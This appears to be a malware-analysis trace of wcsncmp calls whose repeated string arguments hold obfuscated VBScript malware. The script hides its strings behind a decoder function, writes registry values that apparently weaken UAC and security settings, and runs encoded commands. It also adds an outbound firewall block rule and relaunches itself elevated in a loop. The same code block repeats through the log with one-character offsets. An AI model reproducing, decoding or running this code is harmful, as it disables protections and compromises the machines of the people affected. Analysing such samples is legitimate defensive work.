bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0222.984] wcsncmp (_String1="_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 82 [0222.985] wcsncmp (_String1="FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0222.985] wcsncmp (_String1="W_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 74 [0222.985] wcsncmp (_String1="_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 